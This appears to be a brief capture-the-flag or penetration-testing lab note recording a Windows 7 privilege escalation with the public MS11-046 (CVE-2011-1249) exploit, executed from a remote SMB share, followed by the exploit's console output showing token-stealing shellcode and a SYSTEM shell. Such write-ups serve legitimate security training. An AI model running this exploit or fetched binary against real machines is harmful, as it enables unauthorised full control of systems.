4 privesc_2 ms11-046
Using https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046
c:\Users\Public\Downloads> \\10.10.14.2\drive\MS11-046.exe
c:\Windows\System32> whoami
nt authority\system
exit
# shows after exit
[*] MS11-046 (CVE-2011-1249) x86 exploit
[*] by Tomislav Paskalev
[*] Identifying OS
[+] 32-bit
[+] Windows 7
[*] Locating required OS components
[+] ntkrnlpa.exe
[*] Address: 0x8281b000
[*] Offset: 0x00850000
[+] HalDispatchTable
[*] Offset: 0x009793b8
[+] NtQueryIntervalProfile
[*] Address: 0x77535510
[+] ZwDeviceIoControlFile
[*] Address: 0x77534ca0
[*] Setting up exploitation prerequisite
[*] Initialising Winsock DLL
[+] Done
[*] Creating socket
[+] Done
[*] Connecting to closed port
[+] Done
[*] Creating token stealing shellcode
[*] Shellcode assembled
[*] Allocating memory
[+] Address: 0x02070000
[*] Shellcode copied
[*] Exploiting vulnerability
[*] Sending AFD socket connect request
[+] Done
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
Last updated